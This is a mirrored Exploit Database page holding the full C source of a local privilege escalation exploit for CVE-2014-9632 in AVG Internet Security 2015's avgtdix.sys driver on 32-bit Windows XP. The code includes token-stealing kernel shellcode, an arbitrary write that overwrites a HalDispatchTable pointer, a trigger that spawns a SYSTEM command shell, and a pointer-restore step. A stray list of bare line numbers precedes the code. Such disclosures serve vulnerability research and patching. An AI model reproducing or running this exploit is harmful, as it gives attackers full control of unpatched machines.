AVG Internet Security 2015.0.5315 – Arbitrary Write Privilege Escalation

Exploit Database
112 阅读

作者： Parvez Anwar

日期： 2015-02-04
类别：
- local
平台：
- windows
来源：https://www.exploit-db.com/exploits/35993/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

202

203

204

205

206

207

208

209

210

211

212

213

214

215

216

217

218

219

220

221

222

223

224

225

226

227

228

229

230

231

232

233

234

235

236

237

238

239

240

241

242

243

244

245

246

247

248

249

250

251

252

253

254

255

256

257

258

259

260

261

262

263

264

265

266

267

268

269

270

271

272

273

274

275

276

277

278

279

280

281

282

283

284

285

286

287

288

289

290

291

292

293

294

295

296

297

298

299

300

301

302

303

304

305

306

307

308

309

310

311

312

313

314

315

316

317

318

319

320

321

322

323

324

325

326

327

328

329

330

331

332

333

334

335

336

337

338

339

340

341

342

343

344

345

Exploit Title- AVG Internet Security 2015 Arbitrary Write Privilege Escalation

Date - 04th February 2015

Discovered by- Parvez Anwar (@parvezghh)

Vendor Homepage- http://www.avg.com/

Tested Version - 2015.0.5315

Driver Version - 15.0.0.5204 - avgtdix.sys

Tested on OS - 32bit Windows XP SP3

OSVDB- http://www.osvdb.org/show/osvdb/113824

CVE ID - CVE-2014-9632

Vendor fix url - http://www.avg.com/eu-en/avg-release-notes

Fixed Version- 2015.0.5557

Fixed driver ver - 15.0.0.5553

Note

----

Overwritten HAL dispatch table after exploit

kd> dps nt!HalDispatchTable l c

8054ccb800000003

8054ccbc00340000

8054ccc08678d9a0

8054ccc40a050002

8054ccc86e66744e

8054cccc001c0707

8054ccd000000180

8054ccd4000001a4

8054ccd8867d6690

8054ccdc86706480

8054cce000000000

8054cce4804e42d1 nt!ObpTraceDepth+0x19

10 pointers get overwritten. Since input buffer is in our control and pointers

are static in XP I've triggered the overwrite again restoring the pointers.

#include <stdio.h>

#include <windows.h>

#define BUFSIZE 4096

typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {

PVOID Unknown1;

PVOID Unknown2;

PVOID Base;

ULONG Size;

ULONG Flags;

USHORTIndex;

USHORTNameLength;

USHORTLoadCount;

USHORTPathLength;

CHARImageName[256];

} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;

typedef struct _SYSTEM_MODULE_INFORMATION {

ULONG Count;

SYSTEM_MODULE_INFORMATION_ENTRY Module[1];

} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;

typedef enum _SYSTEM_INFORMATION_CLASS {

SystemModuleInformation = 11,

SystemHandleInformation = 16

} SYSTEM_INFORMATION_CLASS;

typedef NTSTATUS (WINAPI *_NtQuerySystemInformation)(

SYSTEM_INFORMATION_CLASS SystemInformationClass,

PVOID SystemInformation,

ULONG SystemInformationLength,

PULONG ReturnLength);

typedef NTSTATUS (WINAPI *_NtQueryIntervalProfile)(

DWORD ProfileSource,

PULONG Interval);

typedef void (*FUNCTPTR)();

// Windows XP SP3

#define XP_KPROCESS 0x44// Offset to _KPROCESS from a _ETHREAD struct

#define XP_TOKEN0xc8// Offset to TOKEN from the _EPROCESS struct

#define XP_UPID 0x84// Offset to UniqueProcessId FROM the _EPROCESS struct

#define XP_APLINKS0x88// Offset to ActiveProcessLinks _EPROCESS struct

BYTE token_steal_xp[] =

{

0x52,// push edx Save edx on the stack

0x53, // push ebx Save ebx on the stack

0x33,0xc0, // xor eax, eax eax = 0

0x64,0x8b,0x80,0x24,0x01,0x00,0x00,// mov eax, fs:[eax+124h] Retrieve ETHREAD

0x8b,0x40,XP_KPROCESS, // mov eax, [eax+XP_KPROCESS] Retrieve _KPROCESS

0x8b,0xc8, // mov ecx, eax

0x8b,0x98,XP_TOKEN,0x00,0x00,0x00, // mov ebx, [eax+XP_TOKEN]Retrieves TOKEN

0x8b,0x80,XP_APLINKS,0x00,0x00,0x00, // mov eax, [eax+XP_APLINKS] <-|Retrieve FLINK from ActiveProcessLinks

0x81,0xe8,XP_APLINKS,0x00,0x00,0x00, // sub eax, XP_APLINKS |Retrieve _EPROCESS Pointer from the ActiveProcessLinks

0x81,0xb8,XP_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00,// cmp [eax+XP_UPID], 4|Compares UniqueProcessId with 4 (System Process)

0x75,0xe8, // jne ----

0x8b,0x90,XP_TOKEN,0x00,0x00,0x00, // mov edx, [eax+XP_TOKEN]Retrieves TOKEN and stores on EDX

0x8b,0xc1, // mov eax, ecx Retrieves KPROCESS stored on ECX

0x89,0x90,XP_TOKEN,0x00,0x00,0x00, // mov [eax+XP_TOKEN], edxOverwrites the TOKEN for the current KPROCESS

0x5b,// pop ebxRestores ebx

0x5a,// pop edxRestores edx

0xc2,0x08// ret 8Away from the kernel

};

BYTE restore_pointers_xp[] =// kd> dps nt!HalDispatchTable

"\xf2\xa3\x6f\x80"// 8054ccbc806fa3f2 hal!HaliQuerySystemInformation

"\xce\xa3\x6f\x80"// 8054ccc0806fa3ce hal!HaliSetSystemInformation

"\x0b\x46\x61\x80"// 8054ccc48061460b nt!xHalQueryBusSlots

"\x00\x00\x00\x00"// 8054ccc800000000

"\x4d\xac\x50\x80"// 8054cccc8050ac4d nt!HalExamineMBR

"\x89\x6f\x5c\x80"// 8054ccd0805c6f89 nt!IoAssignDriveLetters

"\xe5\x4a\x5c\x80"// 8054ccd4805c4ae5 nt!IoReadPartitionTable

"\x7b\x3f\x61\x80"// 8054ccd880613f7b nt!IoSetPartitionInformation

"\xef\x41\x61\x80"// 8054ccdc806141ef nt!IoWritePartitionTable

"\x57\xd1\x52\x80"; // 8054cce08052d157 nt!CcHasInactiveViews

DWORD HalDispatchTableAddress()

{

_NtQuerySystemInformationNtQuerySystemInformation;

PSYSTEM_MODULE_INFORMATION pModuleInfo;

DWORDHalDispatchTable;

CHAR kFullName[256];

PVOIDkBase = NULL;

LPSTRkName;

HMODULEKernel;

FUNCTPTR Hal;

ULONGlen;

NTSTATUS status;

NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation");

if (!NtQuerySystemInformation)

{

printf("[-] Unable to resolve NtQuerySystemInformation\n\n");

return -1;

}

status = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len);

if (!status)

{

printf("[-] An error occured while reading NtQuerySystemInformation. Status = 0x%08x\n\n", status);

return -1;

}

pModuleInfo = (PSYSTEM_MODULE_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, len);

if(pModuleInfo == NULL)

{

printf("[-] An error occurred with GlobalAlloc for pModuleInfo\n\n");

return -1;

}

status = NtQuerySystemInformation(SystemModuleInformation, pModuleInfo, len, &len);

memset(kFullName, 0x00, sizeof(kFullName));

strcpy_s(kFullName, sizeof(kFullName)-1, pModuleInfo->Module[0].ImageName);

kBase = pModuleInfo->Module[0].Base;

printf("[i] Kernel base name %s\n", kFullName);

kName = strrchr(kFullName, '\\');

Kernel = LoadLibraryA(++kName);

if(Kernel == NULL)

{

printf("[-] Failed to load kernel base\n\n");

return -1;

}

Hal = (FUNCTPTR)GetProcAddress(Kernel, "HalDispatchTable");

if(Hal == NULL)

{

printf("[-] Failed to find HalDispatchTable\n\n");

return -1;

}

printf("[i] HalDispatchTable address 0x%08x\n", Hal);

printf("[i] Kernel handle 0x%08x\n", Kernel);

printf("[i] Kernel base address 0x%08x\n", kBase);

HalDispatchTable = ((DWORD)Hal - (DWORD)Kernel + (DWORD)kBase);

printf("[+] Kernel address of HalDispatchTable 0x%08x\n", HalDispatchTable);

if(!HalDispatchTable)

{

printf("[-] Failed to calculate HalDispatchTable\n\n");

return -1;

}

return HalDispatchTable;

}

int GetWindowsVersion()

{

int v = 0;

DWORD version = 0, minVersion = 0, majVersion = 0;

version = GetVersion();

minVersion = (DWORD)(HIBYTE(LOWORD(version)));

majVersion = (DWORD)(LOBYTE(LOWORD(version)));

if (minVersion == 1 && majVersion == 5) v = 1;// "Windows XP;

if (minVersion == 1 && majVersion == 6) v = 2;// "Windows 7";

if (minVersion == 2 && majVersion == 5) v = 3;// "Windows Server 2003;

return v;

}

void spawnShell()

{

STARTUPINFOA si;

PROCESS_INFORMATION pi;

ZeroMemory(&pi, sizeof(pi));

ZeroMemory(&si, sizeof(si));

si.cb = sizeof(si);

si.cb= sizeof(si);

si.dwFlags = STARTF_USESHOWWINDOW;

si.wShowWindow = SW_SHOWNORMAL;

if (!CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi))

{

printf("\n[-] CreateProcess failed (%d)\n\n", GetLastError());

return;

}

CloseHandle(pi.hThread);

CloseHandle(pi.hProcess);

}

int main(int argc, char *argv[])

{

_NtQueryIntervalProfile NtQueryIntervalProfile;

LPVOIDinput[1] = {0};

LPVOIDaddrtoshell;

HANDLEhDevice;

DWORD dwRetBytes = 0;

DWORD HalDispatchTableTarget;

ULONG time = 0;

unsigned char devhandle[MAX_PATH];

printf("-------------------------------------------------------------------------------\n");

printf(" AVG Internet Security 2015 (avgtdix.sys) Arbitrary Write EoP Exploit\n");

printf(" Tested on Windows XP SP3 (32bit)\n");

printf("-------------------------------------------------------------------------------\n\n");

if (GetWindowsVersion() == 1)

{

printf("[i] Running Windows XP\n");

}

if (GetWindowsVersion() == 0)

{

printf("[i] Exploit not supported on this OS\n\n");

return -1;

}

sprintf(devhandle, "\\\\.\\%s", "avgtdi");

NtQueryIntervalProfile = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryIntervalProfile");

if (!NtQueryIntervalProfile)

{

printf("[-] Unable to resolve NtQueryIntervalProfile\n\n");

return -1;

}

addrtoshell = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

if(addrtoshell == NULL)

{

printf("[-] VirtualAlloc allocation failure %.8x\n\n", GetLastError());

return -1;

}

printf("[+] VirtualAlloc allocated memory at 0x%.8x\n", addrtoshell);

memset(addrtoshell, 0x90, BUFSIZE);

memcpy(addrtoshell, token_steal_xp, sizeof(token_steal_xp));

printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_xp));

hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);

if (hDevice == INVALID_HANDLE_VALUE)

{

printf("[-] CreateFile open %s device failed (%d)\n\n", devhandle, GetLastError());

return -1;

}

else

{

printf("[+] Open %s device successful\n", devhandle);

}

HalDispatchTableTarget = HalDispatchTableAddress() + sizeof(DWORD);

printf("[+] HalDispatchTable+4 (0x%08x) will be overwritten\n", HalDispatchTableTarget);

input[0] = addrtoshell;// input buffer contents gets written to our output buffer address

printf("[+] Input buffer contents %08x\n", input[0]);

printf("[~] Press any key to send Exploit. . .\n");

getch();

DeviceIoControl(hDevice, 0x830020f8, input, sizeof(input), (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL);

printf("[+] Buffer sent\n");

printf("[+] Spawning SYSTEM Shell\n");

NtQueryIntervalProfile(2, &time);

spawnShell();

printf("[+] Restoring Hal dispatch table pointers\n\n");

DeviceIoControl(hDevice, 0x830020f8, restore_pointers_xp, sizeof(restore_pointers_xp)-1, (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL);

CloseHandle(hDevice);

return 0;

}